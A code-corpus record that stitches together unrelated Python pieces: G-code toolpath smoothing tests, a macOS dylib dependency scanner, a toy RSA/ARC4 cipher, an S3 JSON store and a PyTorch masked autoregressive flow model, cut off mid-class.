assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 1])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1)
check_distances(data)
plotter(data)
def test_obtuse_corner_with_short_lines(plotter):
data = generate_curves([
"G1 X10 Y0",
"G1 X20 Y0.1"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="middle")
corner_segment(data, l=0, s=1, start="middle", end="middle")
straight_segment(data, l=1, s=2, start="middle", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([10, 0.1])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(10 + np.linalg.norm([10, 0.1]), abs=0.1)
check_distances(data)
plotter(data)
def test_obtuse_corner_with_shorter_and_longer_line(plotter):
data = generate_curves([
"G1 X10 Y0",
"G1 X30 Y0.1"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="middle")
corner_segment(data, l=0, s=1, start="middle", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([20, 0.1])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(10 + np.linalg.norm([20, 0.1]), abs=0.1)
check_distances(data)
plotter(data)
def test_obtuse_corner_with_longer_and_shorter_line(plotter):
data = generate_curves([
"G1 X20 Y0",
"G1 X30 Y-0.1"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="middle")
straight_segment(data, l=1, s=2, start="middle", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 20 + np.linalg.norm([10, 0.1])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(20 + np.linalg.norm([10, 0.1]), abs=0.1)
check_distances(data)
plotter(data)
def test_three_long_lines(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X100 Y100",
"G1 X0 Y100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 5
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="on")
corner_segment(data, l=1, s=3, start="on", end="on")
straight_segment(data, l=2, s=4, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 300
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(300, abs=0.1)
check_distances(data)
plotter(data)
def test_three_short_lines(plotter):
data = generate_curves([
"G1 X10 Y0",
"G1 X20 Y0.1",
"G1 X30 Y0.3"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 5
straight_segment(data, l=0, s=0, start="start", end="middle")
corner_segment(data, l=0, s=1, start="middle", end="middle")
# Note that this line is very short
straight_segment(data, l=1, s=2, start="middle", end="middle")
corner_segment(data, l=1, s=3, start="middle", end="middle")
straight_segment(data, l=2, s=4, start="middle", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) <\
10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]), abs=0.1)
check_distances(data)
plotter(data)
def test_three_long_lines_with_z_move(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X100 Y100",
"G1 Z10",
"G1 X0 Y100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 5
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
straight_segment(data, l=1, s=3, start="end", end="end")
straight_segment(data, l=3, s=4, start="start", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 300
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(300, abs=0.1)
check_distances(data)
plotter(data)
| [
"numpy.sum",
"os.makedirs",
"vibration_compensation.read_gcode",
"os.path.realpath",
"pytest.fixture",
"vibration_compensation.bokeh_imports.Figure",
"numpy.linalg.norm",
"os.path.splitext",
"vibration_compensation.bokeh_imports.save",
"pytest.approx",
"os.path.join"
] | [((205, 235), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (219, 235), False, 'import pytest\n'), ((641, 673), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""function"""'}), "(scope='function')\n", (655, 673), False, 'import pytest\n'), ((328, 356), 'os.path.join', 'os.path.join', (['path', '"""output"""'], {}), "(path, 'output')\n", (340, 356), False, 'import os\n'), ((362, 394), 'os.makedirs', 'os.makedirs', (['path'], {'exist_ok': '(True)'}), '(path, exist_ok=True)\n', (373, 394), False, 'import os\n'), ((511, 524), 'vibration_compensation.bokeh_imports.save', 'plt.save', (['ret'], {}), '(ret)\n', (519, 524), True, 'import vibration_compensation.bokeh_imports as plt\n'), ((585, 617), 'vibration_compensation.read_gcode', 'read_gcode', (['gcode', 'maximum_error'], {}), '(gcode, maximum_error)\n', (595, 617), False, 'from vibration_compensation import read_gcode, Data\n'), ((2045, 2072), 'numpy.linalg.norm', 'np.linalg.norm', (['(point - mid)'], {}), '(point - mid)\n', (2059, 2072), True, 'import numpy as np\n'), ((288, 314), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (304, 314), False, 'import os\n'), ((746, 907), 'vibration_compensation.bokeh_imports.Figure', 'plt.Figure', ([], {'plot_width': '(1000)', 'plot_height': '(1000)', 'x_range': '(-250, 250)', 'y_range': '(-250, 250)', 'match_aspect': '(True)', 'lod_threshold': 'None', 'title': 'request.node.name'}), '(plot_width=1000, plot_height=1000, x_range=(-250, 250), y_range=\n (-250, 250), match_aspect=True, lod_threshold=None, title=request.node.name\n )\n', (756, 907), True, 'import vibration_compensation.bokeh_imports as plt\n'), ((1907, 1936), 'numpy.linalg.norm', 'np.linalg.norm', (['(linea - lineb)'], {}), '(linea - lineb)\n', (1921, 1936), True, 'import numpy as np\n'), ((3002, 3053), 'numpy.linalg.norm', 'np.linalg.norm', (['(data.end_xy - data.start_xy)'], {'axis': '(1)'}), '(data.end_xy - data.start_xy, axis=1)\n', (3016, 3053), True, 'import numpy as np\n'), ((3086, 3108), 'numpy.sum', 'np.sum', (['xy_lengths[:l]'], {}), '(xy_lengths[:l])\n', (3092, 3108), True, 'import numpy as np\n'), ((10870, 10916), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (10876, 10916), True, 'import numpy as np\n'), ((11372, 11418), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (11378, 11418), True, 'import numpy as np\n'), ((11975, 12021), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (11981, 12021), True, 'import numpy as np\n'), ((12042, 12088), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (12048, 12088), True, 'import numpy as np\n'), ((12092, 12119), 'pytest.approx', 'pytest.approx', (['(200)'], {'abs': '(0.1)'}), '(200, abs=0.1)\n', (12105, 12119), False, 'import pytest\n'), ((12560, 12606), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (12566, 12606), True, 'import numpy as np\n'), ((12654, 12700), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (12660, 12700), True, 'import numpy as np\n'), ((13219, 13265), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), 
'(data.smoothed_toolpath.segment_lengths)\n', (13225, 13265), True, 'import numpy as np\n'), ((13311, 13357), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (13317, 13357), True, 'import numpy as np\n'), ((13936, 13982), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (13942, 13982), True, 'import numpy as np\n'), ((14030, 14076), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (14036, 14076), True, 'import numpy as np\n'), ((14679, 14725), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (14685, 14725), True, 'import numpy as np\n'), ((14773, 14819), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (14779, 14819), True, 'import numpy as np\n'), ((15343, 15389), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (15349, 15389), True, 'import numpy as np\n'), ((15435, 15481), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (15441, 15481), True, 'import numpy as np\n'), ((16031, 16077), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (16037, 16077), True, 'import numpy as np\n'), ((16123, 16169), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (16129, 16169), True, 'import numpy as np\n'), ((16723, 16769), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (16729, 16769), True, 'import numpy as np\n'), ((16815, 16861), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (16821, 16861), True, 'import numpy as np\n'), ((17416, 17462), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (17422, 17462), True, 'import numpy as np\n'), ((17508, 17554), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (17514, 17554), True, 'import numpy as np\n'), ((18217, 18263), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (18223, 18263), True, 'import numpy as np\n'), ((18282, 18328), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (18288, 18328), True, 'import numpy as np\n'), ((18346, 18373), 'pytest.approx', 'pytest.approx', (['(300)'], {'abs': '(0.1)'}), '(300, abs=0.1)\n', (18359, 18373), False, 'import pytest\n'), ((19037, 19083), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (19043, 19083), True, 'import numpy as np\n'), ((19170, 19216), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (19176, 19216), True, 'import numpy as np\n'), ((19946, 19992), 'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (19952, 19992), True, 'import numpy as np\n'), ((20011, 20057), 
'numpy.sum', 'np.sum', (['data.smoothed_toolpath.segment_lengths'], {}), '(data.smoothed_toolpath.segment_lengths)\n', (20017, 20057), True, 'import numpy as np\n'), ((20075, 20102), 'pytest.approx', 'pytest.approx', (['(300)'], {'abs': '(0.1)'}), '(300, abs=0.1)\n', (20088, 20102), False, 'import pytest\n'), ((1830, 1859), 'numpy.linalg.norm', 'np.linalg.norm', (['(linea - point)'], {}), '(linea - point)\n', (1844, 1859), True, 'import numpy as np\n'), ((1862, 1891), 'numpy.linalg.norm', 'np.linalg.norm', (['(lineb - point)'], {}), '(lineb - point)\n', (1876, 1891), True, 'import numpy as np\n'), ((4341, 4368), 'pytest.approx', 'pytest.approx', (['(0)'], {'abs': '(1e-12)'}), '(0, abs=1e-12)\n', (4354, 4368), False, 'import pytest\n'), ((4632, 4659), 'pytest.approx', 'pytest.approx', (['(0)'], {'abs': '(0.001)'}), '(0, abs=0.001)\n', (4645, 4659), False, 'import pytest\n'), ((5253, 5280), 'pytest.approx', 'pytest.approx', (['(0)'], {'abs': '(1e-12)'}), '(0, abs=1e-12)\n', (5266, 5280), False, 'import pytest\n'), ((5560, 5587), 'pytest.approx', 'pytest.approx', (['(0)'], {'abs': '(1e-12)'}), '(0, abs=1e-12)\n', (5573, 5587), False, 'import pytest\n'), ((6086, 6113), 'pytest.approx', 'pytest.approx', (['(0)'], {'abs': '(1e-12)'}), '(0, abs=1e-12)\n', (6099, 6113), False, 'import pytest\n'), ((6312, 6339), 'pytest.approx', 'pytest.approx', (['(0)'], {'abs': '(1e-12)'}), '(0, abs=1e-12)\n', (6325, 6339), False, 'import pytest\n'), ((6652, 6679), 'pytest.approx', 'pytest.approx', (['(0)'], {'abs': '(0.001)'}), '(0, abs=0.001)\n', (6665, 6679), False, 'import pytest\n'), ((6963, 6990), 'pytest.approx', 'pytest.approx', (['(0)'], {'abs': '(0.001)'}), '(0, abs=0.001)\n', (6976, 6990), False, 'import pytest\n'), ((8602, 8632), 'pytest.approx', 'pytest.approx', (['(0.01)'], {'abs': '(1e-12)'}), '(0.01, abs=1e-12)\n', (8615, 8632), False, 'import pytest\n'), ((10947, 10973), 'numpy.linalg.norm', 'np.linalg.norm', (['[100, 200]'], {}), '([100, 200])\n', (10961, 10973), True, 'import numpy as np\n'), ((12615, 12641), 'numpy.linalg.norm', 'np.linalg.norm', (['[100, 100]'], {}), '([100, 100])\n', (12629, 12641), True, 'import numpy as np\n'), ((13274, 13298), 'numpy.linalg.norm', 'np.linalg.norm', (['[100, 1]'], {}), '([100, 1])\n', (13288, 13298), True, 'import numpy as np\n'), ((13991, 14017), 'numpy.linalg.norm', 'np.linalg.norm', (['[100, 100]'], {}), '([100, 100])\n', (14005, 14017), True, 'import numpy as np\n'), ((14734, 14760), 'numpy.linalg.norm', 'np.linalg.norm', (['[100, 100]'], {}), '([100, 100])\n', (14748, 14760), True, 'import numpy as np\n'), ((15398, 15422), 'numpy.linalg.norm', 'np.linalg.norm', (['[100, 1]'], {}), '([100, 1])\n', (15412, 15422), True, 'import numpy as np\n'), ((16085, 16110), 'numpy.linalg.norm', 'np.linalg.norm', (['[10, 0.1]'], {}), '([10, 0.1])\n', (16099, 16110), True, 'import numpy as np\n'), ((16777, 16802), 'numpy.linalg.norm', 'np.linalg.norm', (['[20, 0.1]'], {}), '([20, 0.1])\n', (16791, 16802), True, 'import numpy as np\n'), ((17470, 17495), 'numpy.linalg.norm', 'np.linalg.norm', (['[10, 0.1]'], {}), '([10, 0.1])\n', (17484, 17495), True, 'import numpy as np\n'), ((19132, 19157), 'numpy.linalg.norm', 'np.linalg.norm', (['[10, 0.2]'], {}), '([10, 0.2])\n', (19146, 19157), True, 'import numpy as np\n'), ((3743, 3776), 'pytest.approx', 'pytest.approx', (['line_dist'], {'abs': '(0.1)'}), '(line_dist, abs=0.1)\n', (3756, 3776), False, 'import pytest\n'), ((11467, 11491), 'numpy.linalg.norm', 'np.linalg.norm', (['[50, 50]'], {}), '([50, 50])\n', (11481, 11491), 
True, 'import numpy as np\n'), ((11494, 11518), 'numpy.linalg.norm', 'np.linalg.norm', (['[50, 50]'], {}), '([50, 50])\n', (11508, 11518), True, 'import numpy as np\n'), ((12738, 12764), 'numpy.linalg.norm', 'np.linalg.norm', (['[100, 100]'], {}), '([100, 100])\n', (12752, 12764), True, 'import numpy as np\n'), ((13395, 13419), 'numpy.linalg.norm', 'np.linalg.norm', (['[100, 1]'], {}), '([100, 1])\n', (13409, 13419), True, 'import numpy as np\n'), ((14114, 14140), 'numpy.linalg.norm', 'np.linalg.norm', (['[100, 100]'], {}), '([100, 100])\n', (14128, 14140), True, 'import numpy as np\n'), ((14857, 14883), 'numpy.linalg.norm', 'np.linalg.norm', (['[100, 100]'], {}), '([100, 100])\n', (14871, 14883), True, 'import numpy as np\n'), ((15519, 15543), 'numpy.linalg.norm', 'np.linalg.norm', (['[100, 1]'], {}), '([100, 1])\n', (15533, 15543), True, 'import numpy as np\n'), ((16206, 16231), 'numpy.linalg.norm', 'np.linalg.norm', (['[10, 0.1]'], {}), '([10, 0.1])\n', (16220, 16231), True, 'import numpy as np\n'), ((16898, 16923), 'numpy.linalg.norm', 'np.linalg.norm', (['[20, 0.1]'], {}), '([20, 0.1])\n', (16912, 16923), True, 'import numpy as np\n'), ((17591, 17616), 'numpy.linalg.norm', 'np.linalg.norm', (['[10, 0.1]'], {}), '([10, 0.1])\n', (17605, 17616), True, 'import numpy as np\n'), ((19104, 19129), 'numpy.linalg.norm', 'np.linalg.norm', (['[10, 0.1]'], {}), '([10, 0.1])\n', (19118, 19129), True, 'import numpy as np\n'), ((19281, 19306), 'numpy.linalg.norm', 'np.linalg.norm', (['[10, 0.2]'], {}), '([10, 0.2])\n', (19295, 19306), True, 'import numpy as np\n'), ((435, 461), 'os.path.splitext', 'os.path.splitext', (['filename'], {}), '(filename)\n', (451, 461), False, 'import os\n'), ((19253, 19278), 'numpy.linalg.norm', 'np.linalg.norm', (['[10, 0.1]'], {}), '([10, 0.1])\n', (19267, 19278), True, 'import numpy as np\n')] |
import subprocess
import threading
from collections import defaultdict
from concurrent.futures import Executor
from concurrent.futures.thread import ThreadPoolExecutor
class RecursiveLibraryScanner:
    """Recursively collects the dylib dependencies of a Mach-O binary using a thread pool."""
    def __init__(self, executor: Executor, scan_private: bool):
self.executor = executor
self.libraries = defaultdict(set)
self.scanned = set()
self.scan_private = scan_private
self.jobs = []
self.all_done = threading.Event()
    def _check(self, job):
        # Done-callback: once every submitted scan job has finished, unblock scan().
        if all(j.done() for j in self.jobs):
            self.all_done.set()
def _enqueue(self, target):
job = self.executor.submit(self._scan, target)
job.add_done_callback(self._check)
self.jobs.append(job)
def _scan(self, target):
# print("scanning", target, file=sys.stderr)
self.scanned.add(target)
for lib in scan_libraries(target):
self.libraries[target].add(lib)
if lib not in self.scanned:
is_private = smells_private(lib)
if (is_private and self.scan_private) or not is_private:
self._enqueue(lib)
def scan(self, target):
self._enqueue(target)
self.all_done.wait()
return self.libraries
def scan_libraries_recursive(initial_target, scan_private=True):
with ThreadPoolExecutor() as executor:
rls = RecursiveLibraryScanner(executor, scan_private=scan_private)
return rls.scan(initial_target)
def scan_libraries(target):
    """Return the set of dylib paths that `target` links against, parsed from `otool -l`."""
    in_load_dylib = False
    libraries = set()
    for line in subprocess.check_output(
        ["otool", "-l", target], encoding="utf-8"
    ).splitlines():
        line = line.strip()
        # Each LC_LOAD_DYLIB load command is followed by a "name <path> (offset N)"
        # line; take the path from the first such line after the command.
        if line == "cmd LC_LOAD_DYLIB":
            in_load_dylib = True
        if in_load_dylib and line.startswith("name "):
            words = line.split()
            lib = words[1]
            libraries.add(lib)
            in_load_dylib = False
    return libraries
def smells_private(lib):
if lib.startswith("/System/Library"):
return True
if lib.startswith("/usr/lib/"):
return True
if lib.startswith("/usr/local/lib/"):
return True
return False
def filter_private(scanned_libraries):
public_libraries = {
target: {lib for lib in libraries if not smells_private(lib)}
for (target, libraries) in scanned_libraries.items()
if not smells_private(target)
}
return public_libraries
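# Illustrative usage sketch, not part of the original module: it shows how the
# recursive scan and filter_private are meant to compose. The target binary
# below is only an assumed example; any Mach-O executable path would do.
if __name__ == "__main__":
    import pprint
    import sys

    target_binary = sys.argv[1] if len(sys.argv) > 1 else "/bin/ls"
    all_libraries = scan_libraries_recursive(target_binary)
    # Drop system/private dependencies and print what remains
    pprint.pprint(filter_private(all_libraries))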
| [
"collections.defaultdict",
"subprocess.check_output",
"concurrent.futures.thread.ThreadPoolExecutor",
"threading.Event"
] | [((323, 339), 'collections.defaultdict', 'defaultdict', (['set'], {}), '(set)\n', (334, 339), False, 'from collections import defaultdict\n'), ((457, 474), 'threading.Event', 'threading.Event', ([], {}), '()\n', (472, 474), False, 'import threading\n'), ((1339, 1359), 'concurrent.futures.thread.ThreadPoolExecutor', 'ThreadPoolExecutor', ([], {}), '()\n', (1357, 1359), False, 'from concurrent.futures.thread import ThreadPoolExecutor\n'), ((1582, 1648), 'subprocess.check_output', 'subprocess.check_output', (["['otool', '-l', target]"], {'encoding': '"""utf-8"""'}), "(['otool', '-l', target], encoding='utf-8')\n", (1605, 1648), False, 'import subprocess\n')] |
import time
import base64
import binascii
from secrets import token_hex
from rsa import prime
from arc4 import ARC4
def gcd(a, b):
while b != 0:
a, b = b, a % b
return a
def lcm(a, b):
return a * b // gcd(a, b)
def imod(a, n):
    # Brute-force modular inverse: returns c such that a * c == 1 (mod n).
    i = 1
    while True:
        c = n * i + 1
        if c % a == 0:
            c = c // a
            break
        i = i + 1
    return c
def arc4_encrypt(key, message):
arc4 = ARC4(key)
cipher = arc4.encrypt(message)
return cipher
def arc4_decrypt(key, cipher):
arc4 = ARC4(key)
plain = arc4.decrypt(cipher)
return plain
class SimpleRSA:
def __init__(self, bit_length=256):
p, q = 0, 0
while p == q:
p = prime.getprime(bit_length)
q = prime.getprime(bit_length)
self.p = p
self.q = q
self.N = self.p*self.q
self.phi = lcm(self.p - 1, self.q - 1)
self.e = 65537
self.d = imod(self.e, self.phi)
def dump(self):
return (self.p, self.q, self.N, self.phi, self.e, self.d)
def load(self, p, q, N, phi, e, d):
self.p = p
self.q = q
self.N = N
self.phi = phi
self.e = e
self.d = d
def get_pub(self):
return (self.N, self.e)
def get_priv(self):
return (self.N, self.d)
    def encrypt(self, m, other_pubkey):
        if not isinstance(m, int):
            # The hexlified text is parsed as a *decimal* integer, so this only
            # round-trips with decrypt() when the hex string contains no letters
            # (true for the token_hex keys used by Cipher.encrypt_response).
            m = int(binascii.hexlify(m.encode()))
        return pow(m, other_pubkey[1], other_pubkey[0])
    def decrypt(self, c):
        res = pow(c, self.d, self.N)
        return binascii.unhexlify(str(res))
class Cipher(SimpleRSA):
def __init__(self, params):
self.p = params['p']
self.q = params['q']
self.N = params['N']
self.phi = params['phi']
self.e = params['e']
self.d = params['d']
def decrypt_request(self, tmpkey, message):
k = self.decrypt(tmpkey)
message = arc4_decrypt(k, message)
return message
def encrypt_response(self, user_key, message):
tmpkey = token_hex(nbytes=10)
other_key = (user_key['user_key']['N'], user_key['user_key']['e'])
enc_key = self.encrypt(tmpkey, other_key)
cipher = arc4_encrypt(tmpkey, message)
return dict(
key=enc_key,
data=str(base64.b64encode(cipher))[2:-1]
)
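# Illustrative round-trip sketch, not part of the original module: one party
# RSA-encrypts a throw-away ARC4 session key for the other, who recovers it and
# decrypts the payload. The names ("alice"/"bob") and the message are assumptions.
def _example_hybrid_roundtrip():
    alice = SimpleRSA()
    bob = SimpleRSA()
    tmpkey = token_hex(nbytes=10)                    # ARC4 session key (hex string)
    enc_key = alice.encrypt(tmpkey, bob.get_pub())   # RSA-encrypt it for bob
    cipher = arc4_encrypt(tmpkey, b"attack at dawn")
    recovered_key = bob.decrypt(enc_key)             # bytes of the original hex key
    return arc4_decrypt(recovered_key, cipher)      # recovers the plaintext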
if __name__ == "__main__":
    pass
| [
"base64.b64encode",
"secrets.token_hex",
"rsa.prime.getprime",
"arc4.ARC4"
] | [((435, 444), 'arc4.ARC4', 'ARC4', (['key'], {}), '(key)\n', (439, 444), False, 'from arc4 import ARC4\n'), ((541, 550), 'arc4.ARC4', 'ARC4', (['key'], {}), '(key)\n', (545, 550), False, 'from arc4 import ARC4\n'), ((2082, 2102), 'secrets.token_hex', 'token_hex', ([], {'nbytes': '(10)'}), '(nbytes=10)\n', (2091, 2102), False, 'from secrets import token_hex\n'), ((717, 743), 'rsa.prime.getprime', 'prime.getprime', (['bit_length'], {}), '(bit_length)\n', (731, 743), False, 'from rsa import prime\n'), ((760, 786), 'rsa.prime.getprime', 'prime.getprime', (['bit_length'], {}), '(bit_length)\n', (774, 786), False, 'from rsa import prime\n'), ((2342, 2366), 'base64.b64encode', 'base64.b64encode', (['cipher'], {}), '(cipher)\n', (2358, 2366), False, 'import base64\n')] |
# Copyright © 2020 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: <NAME> <<EMAIL>>
#
"""Implementation persistence store using S3."""
import logging
from rudra.data_store.aws import AmazonS3
from src.config.settings import SETTINGS, AWS_SETTINGS
logger = logging.getLogger(__name__)
class PersistenceStore:
"""Persistence store to save Bigquery Data, it uses AWS S3 as of now as data store."""
def __init__(self, s3_client=None):
"""Initialize DataProcessing object."""
self.s3_client = s3_client
if s3_client:
self.s3_client = s3_client
else:
self.s3_client = AmazonS3(
region_name=AWS_SETTINGS.s3_region,
bucket_name=AWS_SETTINGS.s3_bucket_name,
aws_access_key_id=AWS_SETTINGS.s3_access_key_id,
aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key,
local_dev=not SETTINGS.use_cloud_services
)
def update(self, data, bucket_name, filename='collated.json'):
"""Upload s3 bucket."""
# connect after creating or with existing s3 client
self.s3_client.connect()
if not self.s3_client.is_connected():
raise Exception('Unable to connect to s3.')
json_data = dict()
if self.s3_client.object_exists(filename):
logger.info('%s exists, updating it.', filename)
json_data = self.s3_client.read_json_file(filename)
if not json_data:
raise Exception(f'Unable to get the json data path:{bucket_name}/{filename}')
json_data.update(data)
self.s3_client.write_json_file(filename, json_data)
        logger.info('Updated file successfully!')
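# Illustrative usage sketch, not part of the original module: merges a small
# payload into the collated JSON file on S3. The payload keys and file name
# here are assumptions for demonstration purposes only.
if __name__ == '__main__':
    store = PersistenceStore()
    store.update(
        data={'github.com/org/repo': {'stars': 42}},
        bucket_name=AWS_SETTINGS.s3_bucket_name,
        filename='collated.json'
    )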
| [
"rudra.data_store.aws.AmazonS3",
"logging.getLogger"
] | [((780, 807), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (797, 807), False, 'import logging\n'), ((1153, 1400), 'rudra.data_store.aws.AmazonS3', 'AmazonS3', ([], {'region_name': 'AWS_SETTINGS.s3_region', 'bucket_name': 'AWS_SETTINGS.s3_bucket_name', 'aws_access_key_id': 'AWS_SETTINGS.s3_access_key_id', 'aws_secret_access_key': 'AWS_SETTINGS.s3_secret_access_key', 'local_dev': '(not SETTINGS.use_cloud_services)'}), '(region_name=AWS_SETTINGS.s3_region, bucket_name=AWS_SETTINGS.\n s3_bucket_name, aws_access_key_id=AWS_SETTINGS.s3_access_key_id,\n aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key, local_dev=not\n SETTINGS.use_cloud_services)\n', (1161, 1400), False, 'from rudra.data_store.aws import AmazonS3\n')] |
import torch
import torch.nn as nn
import torchvision.transforms as T
from .MADE import MADE
from .Shuffle import Shuffle
from .Flow import SequentialConditionalFlow
from .NormFunctions import ActNorm, RunningBatchNorm1d
from utils.logger import log
class MAF(nn.Module):
def __init__(self, flow_dim, condition_dim, hidden_dim, num_blocks, device):
super(MAF, self).__init__()
self.flow_dim = flow_dim
self.condition_dim = condition_dim
self.hidden_dim = hidden_dim
self.device = device
self.model = SequentialConditionalFlow(sum(
[[MADE(flow_dim, condition_dim, hidden_dim, ind == 0),
RunningBatchNorm1d(flow_dim), ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))] \
for ind in range(num_blocks - 1)] \
+ [[MADE(flow_dim, condition_dim, hidden_dim, False)]],
[]))
self.model.to(device)
self.prior = torch.distributions.Normal(torch.tensor(0., device=device),
torch.tensor(1., device=device))
        # Note: starting as True means the data-dependent init in forward_flow never runs.
        self.initialized = True
def calc_loss(self, inputs, conditions):
raise NotImplementedError
def forward_flow(self, inputs, conditions):
in_shape = inputs.shape
inputs = inputs.reshape(-1, self.flow_dim)
conditions = conditions.reshape(inputs.shape[0], self.condition_dim)
if not self.initialized and inputs.shape[0] != 1: # hack todo fix?
with torch.no_grad():
self.model.data_init(inputs, conditions)
self.initialized = True
z, logjac = self.model.forward_flow(inputs, conditions)
return z.reshape(in_shape), logjac.reshape(in_shape[:-1])
def sample(self, conditions):
batch_size = conditions.shape[0]
with torch.no_grad():
z = self.prior.sample([batch_size, self.flow_dim])
x, _ = self.model.inverse_flow(z, conditions)
return x
    def save(self, path):
        # Note: self.optimizer is never defined in this base class; it is expected
        # to be created by a subclass that implements calc_loss.
        torch.save({
"model": self.model.state_dict(),
"optimizer": self.optimizer.state_dict(),
}, path)
def load(self, path):
state_dict = torch.load(path, map_location=self.device)
self.model.load_state_dict(state_dict["model"])
self.optimizer.load_state_dict(state_dict["optimizer"])
"""
uniform noise to dequantize input
logit(a + (1 - 2a) * image) as in paper
"""
class MAFImageTransform():
def __init__(self, dataset):
if dataset == "mnist":
